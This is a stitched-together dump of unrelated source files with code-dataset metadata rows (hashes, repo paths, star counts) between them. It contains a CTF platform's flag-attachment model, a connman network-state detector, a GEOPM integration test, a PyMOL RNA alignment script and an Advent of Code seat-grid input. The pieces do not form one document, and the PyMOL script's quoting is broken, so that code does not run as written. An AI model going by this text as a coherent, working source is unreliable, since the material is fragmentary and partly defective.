These are files that the administrator wants to
distribute alongside a flag.
"""
uuid = Column(String(36), unique=True, nullable=False, default=lambda: str(uuid4()))
flag_id = Column(Integer, ForeignKey("flag.id"), nullable=False)
_file_name = Column(Unicode(64), nullable=False)
@property
def file_name(self):
return self._file_name
@file_name.setter
def file_name(self, value):
fname = value.replace("\n", "").replace("\r", "")
self._file_name = str(os.path.basename(fname))[:64]
@property
def data(self):
with open(options.flag_attachment_dir + "/" + self.uuid, "rb") as fp:
return decode(fp.read(), "base64")
@data.setter
def data(self, value):
if self.uuid is None:
self.uuid = str(uuid4())
self.byte_size = len(value)
with open(options.flag_attachment_dir + "/" + self.uuid, "wb") as fp:
fp.write(str(encode(value, "base64")).encode())
def delete_data(self):
""" Remove the file from the file system, if it exists """
fpath = options.flag_attachment_dir + "/" + self.uuid
if os.path.exists(fpath) and os.path.isfile(fpath):
os.unlink(fpath)
| 31.111111
| 88
| 0.672768
| 1,288
| 0.575
| 0
| 0
| 666
| 0.297321
| 0
| 0
| 873
| 0.389732
|
22016594c64927e9cac7fbe2989ffcfcf16a646f
| 1,278
|
py
|
Python
|
connman_dispatcher/detect.py
|
a-sk/connman-dispatcher
|
2561ae87ffd26d0f98bb1ab2b430e181be3d01c1
|
[
"0BSD"
] | 4
|
2015-01-04T19:26:01.000Z
|
2017-06-06T21:04:01.000Z
|
connman_dispatcher/detect.py
|
a-sk/connman-dispatcher
|
2561ae87ffd26d0f98bb1ab2b430e181be3d01c1
|
[
"0BSD"
] | 1
|
2015-04-04T13:19:15.000Z
|
2015-04-04T13:19:15.000Z
|
connman_dispatcher/detect.py
|
a-sk/connman-dispatcher
|
2561ae87ffd26d0f98bb1ab2b430e181be3d01c1
|
[
"0BSD"
] | null | null | null |
import glib
import dbus
from dbus.mainloop.glib import DBusGMainLoop
from pyee import EventEmitter
import logbook
logger = logbook.Logger('connman-dispatcher')
__all__ = ['detector']
def property_changed(_, message):
if message.get_member() == "PropertyChanged":
_, state = message.get_args_list()
if state == 'online' and detector.state == 'offline':
logger.info('network state change: online' )
detector.emit('up')
detector.state = 'online'
elif state == 'idle':
logger.info('network state change: offline' )
detector.emit('down')
detector.state = 'offline'
detector = EventEmitter()
DBusGMainLoop(set_as_default=True)
bus = dbus.SystemBus()
bus.add_match_string_non_blocking("interface='net.connman.Manager'")
bus.add_message_filter(property_changed)
manager = dbus.Interface(bus.get_object('net.connman', "/"), 'net.connman.Manager')
def is_online():
properties = manager.GetProperties()
if properties['State'] == 'online':
return True
return False
def run():
detector.state = 'offline'
if is_online:
detector.emit('up')
detector.state = 'online'
mainloop = glib.MainLoop()
mainloop.run()
detector.run = run
| 25.058824
| 83
| 0.661972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 264
| 0.206573
|
2202355dec4485d79be0734da044b8e85dc7a3dc
| 4,294
|
py
|
Python
|
integration/test/test_profile_overflow.py
|
avilcheslopez/geopm
|
35ad0af3f17f42baa009c97ed45eca24333daf33
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
integration/test/test_profile_overflow.py
|
avilcheslopez/geopm
|
35ad0af3f17f42baa009c97ed45eca24333daf33
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
integration/test/test_profile_overflow.py
|
avilcheslopez/geopm
|
35ad0af3f17f42baa009c97ed45eca24333daf33
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright (c) 2015 - 2022, Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
#
"""
Runs an application with a large number of short regions and checks
that the controller successfully runs.
"""
import sys
import unittest
import os
import subprocess
import glob
import geopmpy.io
import geopmpy.agent
import geopmdpy.error
import geopmdpy.topo
from integration.test import geopm_test_launcher
from integration.test import check_trace
class AppConf(object):
"""Class that is used by the test launcher in place of a
geopmpy.io.BenchConf when running the profile_overflow benchmark.
"""
def write(self):
"""Called by the test launcher prior to executing the test application
to write any files required by the application.
"""
pass
def get_exec_path(self):
"""Path to benchmark filled in by template automatically.
"""
script_dir = os.path.dirname(os.path.realpath(__file__))
return os.path.join(script_dir, '.libs', 'test_profile_overflow')
def get_exec_args(self):
"""Returns a list of strings representing the command line arguments
to pass to the test-application for the next run. This is
especially useful for tests that execute the test-application
multiple times.
"""
return []
class TestIntegration_profile_overflow(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Create launcher, execute benchmark and set up class variables.
"""
sys.stdout.write('(' + os.path.basename(__file__).split('.')[0] +
'.' + cls.__name__ + ') ...')
test_name = 'test_profile_overflow'
cls._report_path = '{}.report'.format(test_name)
cls._trace_path = '{}.trace'.format(test_name)
cls._log_path = '{}.log'.format(test_name)
cls._agent_conf_path = test_name + '-agent-config.json'
# Set the job size parameters such that we have a 3 level tree
os.environ["GEOPM_MAX_FAN_OUT"] = "2"
num_node = 4
num_rank = geopmdpy.topo.num_domain(geopmdpy.topo.DOMAIN_CORE) - 2
time_limit = 600
# Configure the test application
app_conf = AppConf()
# Configure the agent
agent_conf = geopmpy.agent.AgentConf(cls._agent_conf_path)
# Create the test launcher with the above configuration
launcher = geopm_test_launcher.TestLauncher(app_conf,
agent_conf,
cls._report_path,
cls._trace_path,
time_limit=time_limit)
launcher.set_num_node(num_node)
launcher.set_num_rank(num_rank)
# Run the test application
try:
launcher.run(test_name)
except subprocess.CalledProcessError:
sys.stderr.write('{} failed; check log for details.\n'.format(test_name))
raise
@classmethod
def tearDownClass(cls):
os.environ.pop("GEOPM_MAX_FAN_OUT")
def test_load_report(self):
'''
Test that the report can be loaded.
'''
report = geopmpy.io.RawReport(self._report_path)
hosts = report.host_names()
for hh in hosts:
runtime = report.raw_totals(hh)['runtime (s)']
self.assertNotEqual(0, runtime)
def test_short_region_count(self):
'''
Test that the count for MPI_Barrier is as expected.
'''
report = geopmpy.io.RawReport(self._report_path)
hosts = report.host_names()
for hh in hosts:
region_data = report.raw_region(hh, 'MPI_Barrier')
count = region_data['count']
self.assertEqual(count, 10000000)
def test_sample_rate(self):
'''
Test that the sample rate is regular.
'''
traces = glob.glob(self._trace_path + "*")
if len(traces) == 0:
raise RuntimeError("No traces found with prefix: {}".format(self._trace_path_prefix))
for tt in traces:
check_trace.check_sample_rate(tt, 0.005)
if __name__ == '__main__':
unittest.main()
| 32.778626
| 97
| 0.614578
| 3,766
| 0.877038
| 0
| 0
| 1,732
| 0.403354
| 0
| 0
| 1,555
| 0.362133
|
2203367508cf03902b996dcb408a29b0ce2106d4
| 13,627
|
py
|
Python
|
Objects/optAlignRNA.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Objects/optAlignRNA.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Objects/optAlignRNA.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
# Description: OptiAlign.py by Jason Vertree modified for aligning multiple RNA structures.
# Source: Generated while helping Miranda Adams at U of Saint Louis.
"""
cmd.do('python')
cmd.do(' ##############################################################################')
cmd.do('#')
cmd.do('# @SUMMARY: -- QKabsch.py. A python implementation of the optimal superposition')
cmd.do('# of two sets of vectors as proposed by Kabsch 1976 & 1978.')
cmd.do('#')
cmd.do('# @AUTHOR: Jason Vertrees')
cmd.do('# @COPYRIGHT: Jason Vertrees (C), 2005-2007')
cmd.do('# @LICENSE: Released under GPL:')
cmd.do('# This program is free software; you can redistribute it and/or modify')
cmd.do('# it under the terms of the GNU General Public License as published by')
cmd.do('# the Free Software Foundation; either version 2 of the License, or')
cmd.do('# (at your option) any later version.')
cmd.do('# This program is distributed in the hope that it will be useful, but WITHOUT')
cmd.do('# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS')
cmd.do('# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.')
cmd.do('#')
cmd.do('# You should have received a copy of the GNU General Public License along with')
cmd.do('# this program; if not, write to the Free Software Foundation, Inc., 51 Franklin')
cmd.do('# Street, Fifth Floor, Boston, MA 02110-1301, USA ')
cmd.do('#')
cmd.do('# DATE : 2007-01-01')
cmd.do('# REV : 2')
cmd.do('# REQUIREMENTS: numpy')
cmd.do('#')
cmd.do('#')
cmd.do('# Modified optAlign.py to use C1' carbon atoms of RNA for alignment.')
cmd.do('# Jan. 29, 2020 ')
cmd.do('# Blaine Mooers, PhD')
cmd.do('# Univ. of Oklahoma Health Sciences Center')
cmd.do('#')
cmd.do('#############################################################################')
cmd.do('from array import *')
cmd.do(' ')
cmd.do('# system stuff')
cmd.do('import os')
cmd.do('import copy')
cmd.do(' ')
cmd.do('# pretty printing')
cmd.do('import pprint')
cmd.do(' ')
cmd.do('# for importing as a plugin into PyMol')
cmd.do('from pymol import cmd')
cmd.do('from pymol import stored')
cmd.do('from pymol import selector')
cmd.do(' ')
cmd.do('# using numpy for linear algebra')
cmd.do('import numpy')
cmd.do(' ')
cmd.do('def optAlignRNA( sel1, sel2 ):')
cmd.do(' """')
cmd.do(' optAlignRNA performs the Kabsch alignment algorithm upon the C1' carbons of two selections.')
cmd.do(' Example: optAlignRNA 1JU7 and i. 1-16 and n. C1', 1CLL and i. 4-146 and n. C1'')
cmd.do(' ')
cmd.do(' Two RMSDs are returned. One comes from the Kabsch algorithm and the other from')
cmd.do(' PyMOL based upon your selections.')
cmd.do(' ')
cmd.do(' This function can be run in a for loop to fit multiple structures with a common prefix name:')
cmd.do(' ')
cmd.do(' for x in cmd.get_names(): optAlignRNA(x, "1JU7_0001")')
cmd.do(' ')
cmd.do(' or get the rmsds for all combinations, do the following:')
cmd.do(' ')
cmd.do(' [[optAlignRNA(x, y) for x in cmd.get_names()] for y in cmd.get_names()]')
cmd.do('')
cmd.do(' """')
cmd.do(' cmd.reset()')
cmd.do(' ')
cmd.do(' # make the lists for holding coordinates')
cmd.do(' # partial lists')
cmd.do(' stored.sel1 = []')
cmd.do(' stored.sel2 = []')
cmd.do(' # full lists')
cmd.do(' stored.mol1 = []')
cmd.do(' stored.mol2 = []')
cmd.do(' ')
cmd.do(' # -- CUT HERE')
cmd.do(' sel1 += " and N. C1'"')
cmd.do(' sel2 += " and N. C1'"')
cmd.do(' # -- CUT HERE')
cmd.do(' ')
cmd.do(' # Get the selected coordinates. We')
cmd.do(' # align these coords.')
cmd.do(' cmd.iterate_state(1, selector.process(sel1), "stored.sel1.append([x,y,z])")')
cmd.do(' cmd.iterate_state(1, selector.process(sel2), "stored.sel2.append([x,y,z])")')
cmd.do(' ')
cmd.do(' # get molecule name')
cmd.do(' mol1 = cmd.identify(sel1,1)[0][0]')
cmd.do(' mol2 = cmd.identify(sel2,1)[0][0]')
cmd.do(' ')
cmd.do(' # Get all molecule coords. We do this because')
cmd.do(' # we have to rotate the whole molcule, not just')
cmd.do(' # the aligned selection')
cmd.do(' cmd.iterate_state(1, mol1, "stored.mol1.append([x,y,z])")')
cmd.do(' cmd.iterate_state(1, mol2, "stored.mol2.append([x,y,z])")')
cmd.do(' ')
cmd.do(' # check for consistency')
cmd.do(' assert len(stored.sel1) == len(stored.sel2)')
cmd.do(' L = len(stored.sel1)')
cmd.do(' assert L > 0')
cmd.do(' ')
cmd.do(' # must alway center the two proteins to avoid')
cmd.do(' # affine transformations. Center the two proteins')
cmd.do(' # to their selections.')
cmd.do(' COM1 = numpy.sum(stored.sel1,axis=0) / float(L)')
cmd.do(' COM2 = numpy.sum(stored.sel2,axis=0) / float(L)')
cmd.do(' stored.sel1 -= COM1')
cmd.do(' stored.sel2 -= COM2')
cmd.do(' ')
cmd.do(' # Initial residual, see Kabsch.')
cmd.do(' E0 = numpy.sum( numpy.sum(stored.sel1 * stored.sel1,axis=0),axis=0) + numpy.sum( numpy.sum(stored.sel2 * stored.sel2,axis=0),axis=0)')
cmd.do(' ')
cmd.do(' #')
cmd.do(' # This beautiful step provides the answer. V and Wt are the orthonormal')
cmd.do(' # bases that when multiplied by each other give us the rotation matrix, U.')
cmd.do(' # S, (Sigma, from SVD) provides us with the error! Isn't SVD great!')
cmd.do(' V, S, Wt = numpy.linalg.svd( numpy.dot( numpy.transpose(stored.sel2), stored.sel1))')
cmd.do(' ')
cmd.do(' # we already have our solution, in the results from SVD.')
cmd.do(' # we just need to check for reflections and then produce')
cmd.do(' # the rotation. V and Wt are orthonormal, so their det's')
cmd.do(' # are +/-1.')
cmd.do(' reflect = float(str(float(numpy.linalg.det(V) * numpy.linalg.det(Wt))))')
cmd.do(' ')
cmd.do(' if reflect == -1.0:')
cmd.do(' S[-1] = -S[-1]')
cmd.do(' V[:,-1] = -V[:,-1]')
cmd.do(' ')
cmd.do(' RMSD = E0 - (2.0 * sum(S))')
cmd.do(' RMSD = numpy.sqrt(abs(RMSD / L))')
cmd.do(' ')
cmd.do(' #U is simply V*Wt')
cmd.do(' U = numpy.dot(V, Wt)')
cmd.do(' ')
cmd.do(' # rotate and translate the molecule')
cmd.do(' stored.sel2 = numpy.dot((stored.mol2 - COM2), U)')
cmd.do(' stored.sel2 = stored.sel2.tolist()')
cmd.do(' # center the molecule')
cmd.do(' stored.sel1 = stored.mol1 - COM1')
cmd.do(' stored.sel1 = stored.sel1.tolist()')
cmd.do(' ')
cmd.do(' # let PyMol know about the changes to the coordinates')
cmd.do(' cmd.alter_state(1,mol1,"(x,y,z)=stored.sel1.pop(0)")')
cmd.do(' cmd.alter_state(1,mol2,"(x,y,z)=stored.sel2.pop(0)")')
cmd.do(' ')
cmd.do(' #print("Moved: %s Reference: %s RMSD = %f" % mol1, mol2, RMSD)')
cmd.do(' print("% s, % s,% 5.3f" % (mol1, mol2, RMSD))')
cmd.do(' ')
cmd.do(' # make the alignment OBVIOUS')
cmd.do(' cmd.hide("everything")')
cmd.do(' cmd.show("ribbon", sel1 + " or " + sel2)')
cmd.do(' cmd.color("gray70", mol1 )')
cmd.do(' cmd.color("magenta", mol2 )')
cmd.do(' cmd.color("red", "visible")')
cmd.do(' cmd.show("ribbon", "not visible")')
cmd.do(' cmd.center("visible")')
cmd.do(' cmd.orient()')
cmd.do(' cmd.zoom("visible")')
cmd.do(' ')
cmd.do('cmd.extend("optAlignRNA", optAlignRNA)')
cmd.do('python end')
"""
cmd.do('python')
cmd.do(' ##############################################################################')
cmd.do('#')
cmd.do('# @SUMMARY: -- QKabsch.py. A python implementation of the optimal superposition')
cmd.do('# of two sets of vectors as proposed by Kabsch 1976 & 1978.')
cmd.do('#')
cmd.do('# @AUTHOR: Jason Vertrees')
cmd.do('# @COPYRIGHT: Jason Vertrees (C), 2005-2007')
cmd.do('# @LICENSE: Released under GPL:')
cmd.do('# This program is free software; you can redistribute it and/or modify')
cmd.do('# it under the terms of the GNU General Public License as published by')
cmd.do('# the Free Software Foundation; either version 2 of the License, or')
cmd.do('# (at your option) any later version.')
cmd.do('# This program is distributed in the hope that it will be useful, but WITHOUT')
cmd.do('# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS')
cmd.do('# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.')
cmd.do('#')
cmd.do('# You should have received a copy of the GNU General Public License along with')
cmd.do('# this program; if not, write to the Free Software Foundation, Inc., 51 Franklin')
cmd.do('# Street, Fifth Floor, Boston, MA 02110-1301, USA ')
cmd.do('#')
cmd.do('# DATE : 2007-01-01')
cmd.do('# REV : 2')
cmd.do('# REQUIREMENTS: numpy')
cmd.do('#')
cmd.do('#')
cmd.do('# Modified optAlign.py to use C1' carbon atoms of RNA for alignment.')
cmd.do('# Jan. 29, 2020 ')
cmd.do('# Blaine Mooers, PhD')
cmd.do('# Univ. of Oklahoma Health Sciences Center')
cmd.do('#')
cmd.do('#############################################################################')
cmd.do('from array import *')
cmd.do(' ')
cmd.do('# system stuff')
cmd.do('import os')
cmd.do('import copy')
cmd.do(' ')
cmd.do('# pretty printing')
cmd.do('import pprint')
cmd.do(' ')
cmd.do('# for importing as a plugin into PyMol')
cmd.do('from pymol import cmd')
cmd.do('from pymol import stored')
cmd.do('from pymol import selector')
cmd.do(' ')
cmd.do('# using numpy for linear algebra')
cmd.do('import numpy')
cmd.do(' ')
cmd.do('def optAlignRNA( sel1, sel2 ):')
cmd.do(' """')
cmd.do(' optAlignRNA performs the Kabsch alignment algorithm upon the C1' carbons of two selections.')
cmd.do(' Example: optAlignRNA 1JU7 and i. 1-16 and n. C1', 1CLL and i. 4-146 and n. C1'')
cmd.do(' ')
cmd.do(' Two RMSDs are returned. One comes from the Kabsch algorithm and the other from')
cmd.do(' PyMOL based upon your selections.')
cmd.do(' ')
cmd.do(' This function can be run in a for loop to fit multiple structures with a common prefix name:')
cmd.do(' ')
cmd.do(' for x in cmd.get_names(): optAlignRNA(x, "1JU7_0001")')
cmd.do(' ')
cmd.do(' or get the rmsds for all combinations, do the following:')
cmd.do(' ')
cmd.do(' [[optAlignRNA(x, y) for x in cmd.get_names()] for y in cmd.get_names()]')
cmd.do('')
cmd.do(' """')
cmd.do(' cmd.reset()')
cmd.do(' ')
cmd.do(' # make the lists for holding coordinates')
cmd.do(' # partial lists')
cmd.do(' stored.sel1 = []')
cmd.do(' stored.sel2 = []')
cmd.do(' # full lists')
cmd.do(' stored.mol1 = []')
cmd.do(' stored.mol2 = []')
cmd.do(' ')
cmd.do(' # -- CUT HERE')
cmd.do(' sel1 += " and N. C1'"')
cmd.do(' sel2 += " and N. C1'"')
cmd.do(' # -- CUT HERE')
cmd.do(' ')
cmd.do(' # Get the selected coordinates. We')
cmd.do(' # align these coords.')
cmd.do(' cmd.iterate_state(1, selector.process(sel1), "stored.sel1.append([x,y,z])")')
cmd.do(' cmd.iterate_state(1, selector.process(sel2), "stored.sel2.append([x,y,z])")')
cmd.do(' ')
cmd.do(' # get molecule name')
cmd.do(' mol1 = cmd.identify(sel1,1)[0][0]')
cmd.do(' mol2 = cmd.identify(sel2,1)[0][0]')
cmd.do(' ')
cmd.do(' # Get all molecule coords. We do this because')
cmd.do(' # we have to rotate the whole molcule, not just')
cmd.do(' # the aligned selection')
cmd.do(' cmd.iterate_state(1, mol1, "stored.mol1.append([x,y,z])")')
cmd.do(' cmd.iterate_state(1, mol2, "stored.mol2.append([x,y,z])")')
cmd.do(' ')
cmd.do(' # check for consistency')
cmd.do(' assert len(stored.sel1) == len(stored.sel2)')
cmd.do(' L = len(stored.sel1)')
cmd.do(' assert L > 0')
cmd.do(' ')
cmd.do(' # must alway center the two proteins to avoid')
cmd.do(' # affine transformations. Center the two proteins')
cmd.do(' # to their selections.')
cmd.do(' COM1 = numpy.sum(stored.sel1,axis=0) / float(L)')
cmd.do(' COM2 = numpy.sum(stored.sel2,axis=0) / float(L)')
cmd.do(' stored.sel1 -= COM1')
cmd.do(' stored.sel2 -= COM2')
cmd.do(' ')
cmd.do(' # Initial residual, see Kabsch.')
cmd.do(' E0 = numpy.sum( numpy.sum(stored.sel1 * stored.sel1,axis=0),axis=0) + numpy.sum( numpy.sum(stored.sel2 * stored.sel2,axis=0),axis=0)')
cmd.do(' ')
cmd.do(' #')
cmd.do(' # This beautiful step provides the answer. V and Wt are the orthonormal')
cmd.do(' # bases that when multiplied by each other give us the rotation matrix, U.')
cmd.do(' # S, (Sigma, from SVD) provides us with the error! Isn't SVD great!')
cmd.do(' V, S, Wt = numpy.linalg.svd( numpy.dot( numpy.transpose(stored.sel2), stored.sel1))')
cmd.do(' ')
cmd.do(' # we already have our solution, in the results from SVD.')
cmd.do(' # we just need to check for reflections and then produce')
cmd.do(' # the rotation. V and Wt are orthonormal, so their det's')
cmd.do(' # are +/-1.')
cmd.do(' reflect = float(str(float(numpy.linalg.det(V) * numpy.linalg.det(Wt))))')
cmd.do(' ')
cmd.do(' if reflect == -1.0:')
cmd.do(' S[-1] = -S[-1]')
cmd.do(' V[:,-1] = -V[:,-1]')
cmd.do(' ')
cmd.do(' RMSD = E0 - (2.0 * sum(S))')
cmd.do(' RMSD = numpy.sqrt(abs(RMSD / L))')
cmd.do(' ')
cmd.do(' #U is simply V*Wt')
cmd.do(' U = numpy.dot(V, Wt)')
cmd.do(' ')
cmd.do(' # rotate and translate the molecule')
cmd.do(' stored.sel2 = numpy.dot((stored.mol2 - COM2), U)')
cmd.do(' stored.sel2 = stored.sel2.tolist()')
cmd.do(' # center the molecule')
cmd.do(' stored.sel1 = stored.mol1 - COM1')
cmd.do(' stored.sel1 = stored.sel1.tolist()')
cmd.do(' ')
cmd.do(' # let PyMol know about the changes to the coordinates')
cmd.do(' cmd.alter_state(1,mol1,"(x,y,z)=stored.sel1.pop(0)")')
cmd.do(' cmd.alter_state(1,mol2,"(x,y,z)=stored.sel2.pop(0)")')
cmd.do(' ')
cmd.do(' #print("Moved: %s Reference: %s RMSD = %f" % mol1, mol2, RMSD)')
cmd.do(' print("% s, % s,% 5.3f" % (mol1, mol2, RMSD))')
cmd.do(' ')
cmd.do(' # make the alignment OBVIOUS')
cmd.do(' cmd.hide("everything")')
cmd.do(' cmd.show("ribbon", sel1 + " or " + sel2)')
cmd.do(' cmd.color("gray70", mol1 )')
cmd.do(' cmd.color("magenta", mol2 )')
cmd.do(' cmd.color("red", "visible")')
cmd.do(' cmd.show("ribbon", "not visible")')
cmd.do(' cmd.center("visible")')
cmd.do(' cmd.orient()')
cmd.do(' cmd.zoom("visible")')
cmd.do(' ')
cmd.do('cmd.extend("optAlignRNA", optAlignRNA)')
cmd.do('python end')
| 41.419453
| 143
| 0.634329
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11,486
| 0.842885
|
220378f315f7e2f7d8cd6b8b856c000fc8a490f5
| 12,933
|
py
|
Python
|
2020/day11.py
|
asmeurer/advent-of-code
|
3ba3edb0c29994487f1b3344383dc41dfea9bfcb
|
[
"MIT"
] | null | null | null |
2020/day11.py
|
asmeurer/advent-of-code
|
3ba3edb0c29994487f1b3344383dc41dfea9bfcb
|
[
"MIT"
] | null | null | null |
2020/day11.py
|
asmeurer/advent-of-code
|
3ba3edb0c29994487f1b3344383dc41dfea9bfcb
|
[
"MIT"
] | null | null | null |
test_input = """
L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL
"""
test_input2 = """
.......#.
...#.....
.#.......
.........
..#L....#
....#....
.........
#........
...#.....
"""
test_input3 = """
.............
.L.L.#.#.#.#.
.............
"""
test_input4 = """
.##.##.
#.#.#.#
##...##
...L...
##...##
#.#.#.#
.##.##.
"""
input = """
LL.LL.LLLLLL.LLLLLLLLLLLLLLLLLL.LLLLL..LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLL.LL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LL.LLLLLLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
.LL...LL.L.L....LL..LL..L.L.L..L.....L...LL.....LLL..L..L..L.....L.L..LLLL...LL.LL.L.......
LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLL..LLLLLLLLLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LL.LLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LL.L......L...LL....L...L.LL.L.....L.LL.L....L...LLL....LL.....LL.L.LLL...LL.L...LLL.L.L...
LLLLLLLLLLLL.LLLLLLLL.L.LL.L.LLLLLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLLLLL.LL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.L.LLLLL.LLLLLLLLLLLL.LLLL.LLLLLLL..LLLLLL.LLLL.LLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLL.L.LL.LLLLL
.LLLL.LLLLLL.LLLLLLLL.LLLLLLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
...L..L......L..L.L.......LL...L.LL.L...LL...L..LL....L....L.L..L...L...L.L.....LL.....L..L
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLL.LL
LLLLL.LLLLLLLL.LL.LLLLLLLL.LLLL.LLLLLL.LLLLLLLLLLL.L.LLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLL.LLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.L.LLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLLLLLLLL.LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
.......LL.L.L...LL..L....LL....L.L.L....L......L..LL...LL.LLL..L....L......L.LLL.L.....LLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLLLLLL.LLLLLLLLL.LLLL.L.LLLL.LLLLLLLL.LLLLLL.L.LLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLLLLLLL.
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLL.LLL.LLLLLLLL.LLLL.LLLLLLLL.LLLLLL.LLL..LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLLLLL.LLLLLLL
LLLLL.LLLLLL.LL.LLLLLLLLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLLLLLLL.LLL.LLLL.LLLLLLLLLLLLLLLLL
.L........L..L.L.LLLLL.......LL.......L..L.L..LL.L......L.......LLL..LLL.LL...L.L...L.LL.L.
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
